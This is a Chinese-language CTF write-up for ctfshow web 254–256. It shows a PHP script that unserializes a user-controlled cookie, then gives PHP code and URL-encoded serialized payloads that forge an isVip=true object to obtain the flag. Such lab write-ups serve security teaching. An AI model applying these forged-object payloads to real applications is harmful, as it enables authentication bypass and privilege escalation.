web 254
和反序列化没啥关系,就是代码审计
payload:?username=xxxxxx&password=xxxxxx
web 255
账号密码的赋值和上面一样,只是多了一个cookie['user'],用burp抓包修改cookie即可
// The script echoes its own source to the client, which is what exposes the code below.
highlight_file(__FILE__);
// flag.php presumably defines the global $flag that ctfShowUser::vipOneKeyGetFlag() reads.
include 'flag.php';
/**
 * User object that the script below rebuilds from the client's cookie via unserialize().
 *
 * Every public property therefore carries whatever value the serialized string supplies;
 * nothing in this class ever assigns $isVip itself.
 */
class ctfShowUser{
    /** Expected login name; compared with === in login(). */
    public $username = 'xxxxxx';
    /** Expected password; compared with === in login(). */
    public $password = 'xxxxxx';
    /** Gate for vipOneKeyGetFlag(); false unless the deserialized data says otherwise. */
    public $isVip = false;

    /** Returns $isVip as-is (no cast), so callers see exactly what was deserialized. */
    public function checkVip(){
        return $this->isVip;
    }

    /** Strict (===) comparison of both credentials; true only when both match. */
    public function login($u,$p){
        if ($u !== $this->username) {
            return false;
        }
        return $p === $this->password;
    }

    /** Prints the flag from the global scope when $isVip is truthy, a refusal otherwise. */
    public function vipOneKeyGetFlag(){
        if (!$this->isVip) {
            echo "no vip, no flag";
            return;
        }
        global $flag;
        echo "your flag is ".$flag;
    }
}
// Credentials come from the query string; the isset() checks only reject null values.
$username = $_GET['username'];
$password = $_GET['password'];
if (isset($username) && isset($password)) {
    // NOTE(review): unserialize() on raw cookie data lets the client choose the class and every
    // property value (including $isVip). For untrusted input prefer json_decode(), or at minimum
    // pass the allowed_classes option to unserialize().
    $user = unserialize($_COOKIE['user']);
    if (!$user->login($username, $password)) {
        echo "no vip,no flag";
    } elseif ($user->checkVip()) {
        $user->vipOneKeyGetFlag();
    }
}
与上一题一样,需要满足$isVip=true,不同的是看上去好像没有能让它为true的地方。这里可以自己实例化一个对象,把里面的isVip设为true,然后再序列化一下
<?php
/**
 * Minimal local copy of ctfShowUser: only the property that gates the flag is declared,
 * so serialize() emits just that one field.
 */
class ctfShowUser{
    /** Set to true here so the serialized object satisfies checkVip() on the server. */
    public $isVip = true;
}
// Print the serialized object; its ';' characters must be percent-encoded before it goes in a cookie.
$a = new ctfShowUser();
print serialize($a);
因为分号在cookie里会算作截断,所以用url编码一下,分号的编码是%3b
O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}
web 256
与上题一样需要实例化,不过要加上账号密码的赋值,因为这题要满足账号和密码不一样
<?php
/**
 * Local copy of ctfShowUser with all three properties declared, so serialize() emits
 * username, password and isVip together.
 */
class ctfShowUser{
    /** Login name; must match the username passed in the query string. */
    public $username = 'a';
    /** Password; deliberately different from the username. */
    public $password = 'b';
    /** Set to true so the serialized object satisfies checkVip() on the server. */
    public $isVip = true;
}
// Print the serialized object; every ';' must be percent-encoded before it goes in a cookie.
$a = new ctfShowUser();
print serialize($a);
所以get提交/?username=a&password=b
cookie的值写这个
O:11:"ctfShowUser":3:{s:8:"username"%3bs:1:"a"%3bs:8:"password"%3bs:1:"b"%3bs:5:"isVip"%3bb:1%3b}